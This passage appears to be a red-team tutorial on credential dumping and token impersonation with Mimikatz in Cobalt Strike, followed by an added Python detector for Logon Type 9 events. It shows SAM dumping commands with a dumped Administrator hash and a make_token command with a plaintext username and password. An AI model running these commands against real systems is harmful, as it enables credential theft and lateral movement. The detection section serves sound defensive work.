In this section we will talk about credential dumping.
First, let’s start by dumping the SAM file.
mimikatz token::elevate ; lsadump::sam

We got the Administrator hash:
User : Administrator
Hash NTLM: fc525c9683e8fe067095ba2ddc971889
lm - 0: 91b6e660bcac036ae7ab67a3d383bc82
ntlm- 0: fc525c9683e8fe067095ba2ddc971889
In Cobalt Strike Mimikatz, we can prefix the command with “!” to make sure that it is executed as SYSTEM.
Now let’s try it.
mimikatz !lsadump::sam

And we got the same output.
In Cobalt Strike Mimikatz, we can prefix the command with “@” so that, if we are trying to perform an action like DCSync against another machine, the command runs while impersonating Beacon’s current token.
Now let’s look at token impersonation.
getuid

Now let’s make a new token.
make_token DEV\nlamb F3rrari
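
From the defender's side (an added example, not part of the original walkthrough): make_token builds its token with LogonUser and the NEW_CREDENTIALS logon type, so the host records a Security event 4624 with Logon Type 9. The sketch below filters events for that pattern; all hosts, accounts, paths and the allowlist are constructed or hypothetical.

```python
# Added example. Field names follow the Windows Security 4624 event schema;
# every host, account and path in SAMPLE_EVENTS is constructed.
NEW_CREDENTIALS = 9  # LOGON32_LOGON_NEW_CREDENTIALS (same type as "runas /netonly")

SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "WKSTN-01", "LogonType": "2",
     "SubjectDomainName": "CORP", "SubjectUserName": "WKSTN-01$",
     "TargetOutboundDomainName": "-", "TargetOutboundUserName": "-",
     "ProcessName": "C:\\Windows\\System32\\winlogon.exe"},
    {"EventID": 4624, "Computer": "WKSTN-01", "LogonType": "9",
     "SubjectDomainName": "CORP", "SubjectUserName": "alice",
     "TargetOutboundDomainName": "CORP", "TargetOutboundUserName": "svc_backup",
     "ProcessName": "C:\\Users\\alice\\AppData\\Local\\Temp\\updater.exe"},
    {"EventID": 4624, "Computer": "ADMIN-02", "LogonType": "9",
     "SubjectDomainName": "CORP", "SubjectUserName": "bob",
     "TargetOutboundDomainName": "CORP", "TargetOutboundUserName": "bob-adm",
     "ProcessName": "C:\\Program Files\\ExampleAdminTool\\tool.exe"},
]
# Hypothetical allowlist of binaries expected to perform netonly logons.
ALLOWED = ["C:\\Program Files\\ExampleAdminTool\\tool.exe"]

def outbound_identity(ev):
    """DOMAIN\\user of the network-only credentials, or None if unset."""
    user = ev.get("TargetOutboundUserName", "-")
    if user in ("", "-"):
        return None
    return f'{ev.get("TargetOutboundDomainName", "-")}\\{user}'

def find_netonly_logons(events, allowed_processes=()):
    """Return (host, caller, outbound identity, process) for type 9 logons where
    the outbound credentials differ from the caller and the process is not allowlisted."""
    allowed = {p.lower() for p in allowed_processes}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4624 or int(ev.get("LogonType", 0)) != NEW_CREDENTIALS:
            continue
        caller = f'{ev.get("SubjectDomainName")}\\{ev.get("SubjectUserName")}'
        outbound = outbound_identity(ev)
        proc = ev.get("ProcessName", "")
        if outbound and outbound.lower() != caller.lower() and proc.lower() not in allowed:
            hits.append((ev["Computer"], caller, outbound, proc))
    return hits

if __name__ == "__main__":
    for hit in find_netonly_logons(SAMPLE_EVENTS, ALLOWED):
        print(hit)
```

Type 9 logons also come from legitimate "runas /netonly" use, so the allowlist and the caller/outbound comparison are there to cut noise, not to prove malice.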